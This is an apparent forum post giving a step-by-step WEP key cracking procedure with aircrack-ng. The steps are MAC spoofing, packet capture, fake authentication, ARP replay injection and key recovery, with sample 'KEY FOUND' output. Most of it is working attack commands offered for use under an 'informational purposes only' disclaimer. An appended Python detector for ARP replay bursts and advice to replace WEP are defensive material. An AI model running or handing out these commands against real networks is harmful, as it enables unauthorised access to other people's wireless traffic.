Aircrack-NG (Step by Step)
[[ Cracking Wep with Aircrack ]]
Posted Tue, 03/17/2009 - 12:00 by Anonymous
Below is a step-by-step guide that I have made several tweaks to for ultimate speed cracking for WEP.
Enabling Monitor Mode on your Wireless Card
airmon-ng start wifi0
Bringing down the interface to change the MAC address
ifconfig ath0 down
Utilizing macchanger to set the MAC address to a fixed value (-m takes the address to use)
macchanger -m 00:11:22:33:44:55 ath0
Bringing your wireless interface back online
ifconfig ath0 up
Utilizing airodump-ng to dump packets received on channel 2 to a capture file (-w gives the file name prefix). The BSSID is the MAC address of the access point.
airodump-ng -c 2 -w nsa.gov.ivs --bssid 00:00:00:00:00:00 ath0
Using Aireplay to create a successful authentication.
aireplay-ng -1 6000 -a 00:00:00:00:00:00 -h 00:11:22:33:44:55 ath0
Utilizing Aireplay to inject ARP packets back into the network
aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:00:00:00:00 -h 00:11:22:33:44:55 ath0
Running Aircrack to test keys against capture
sudo aircrack-ng nsa.gov.ivs-01.cap
The end result will look like this. If you're lucky, and depending on the key length, you can do it with as few as 5,000 IVs.
[00:00:00] Tested 5 keys (got 25085 IVs)
KB depth byte(vote)
0 1/ 2 D4(32256) 43(30976) 62(30976) 03(30720) 32(30464) 78(30464) 1B(29696)
1 0/ 1 9F(35584) AA(33536) 62(32768) C5(32512) 45(32256) 57(31744) F8(31488)
2 0/ 1 8C(35584) 24(30720) 18(29952) 88(29952) 06(29696) 8D(29696) CD(29696)
3 0/ 2 18(31232) 44(30976) 6C(30720) B8(30720) 25(30464) 61(30464) 8A(30208)
4 0/ 1 4B(34560) AB(32256) 40(30976) 80(30720) B5(30720) C9(30464) 89(30208)
KEY FOUND! [ D4:9F:8C:45:4B ]
Decrypted correctly: 100%
This is for informational purposes only!!
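Seen from the network owner's side, the ARP injection step above stands out: one station sends the same encrypted broadcast frame at a very high rate. The sketch below is an added example, not part of the original post; the record layout, the 1-second window, the threshold of 100 frames and the sample data are all assumptions made for illustration.

```python
from collections import defaultdict, deque

BROADCAST = "FF:FF:FF:FF:FF:FF"

def find_arp_replay(frames, window_ms=1000, threshold=100):
    """Flag stations sending bursts of identical-length encrypted broadcasts.

    frames: iterable of (ts_ms, bssid, src, dst, length, protected) tuples,
    a hypothetical record layout a monitor-mode sensor could export.
    Returns {(bssid, src): peak frame count seen inside one window}.
    """
    recent = defaultdict(deque)  # (bssid, src, length) -> timestamps in window
    peaks = {}
    for ts, bssid, src, dst, length, protected in sorted(frames):
        # Replayed ARP requests are encrypted data frames to broadcast.
        if not protected or dst.upper() != BROADCAST:
            continue
        q = recent[(bssid, src, length)]
        q.append(ts)
        while ts - q[0] > window_ms:  # drop timestamps that left the window
            q.popleft()
        if len(q) > threshold:
            key = (bssid, src)
            peaks[key] = max(peaks.get(key, 0), len(q))
    return peaks

def constructed_sample():
    """Constructed data: one quiet client and one station replaying a frame."""
    bssid = "00:00:00:00:00:00"  # placeholder BSSID, as used on the page
    frames = []
    # Ordinary client: one encrypted broadcast every 2 seconds.
    for i in range(10):
        frames.append((i * 2000, bssid, "AA:BB:CC:DD:EE:01", BROADCAST, 68, True))
    # Replaying station: the same 68-byte frame every 2 ms for 2 seconds.
    for i in range(1000):
        frames.append((5000 + i * 2, bssid, "00:11:22:33:44:55", BROADCAST, 68, True))
    return frames

if __name__ == "__main__":
    for (bssid, src), peak in find_arp_replay(constructed_sample()).items():
        print(f"possible ARP replay on {bssid} from {src}: {peak} frames in 1 s")
```

An alert like this only buys time. The lasting fix is to retire WEP on the access point in favour of WPA2 or WPA3, since the statistical attack shown above needs nothing more than captured IVs.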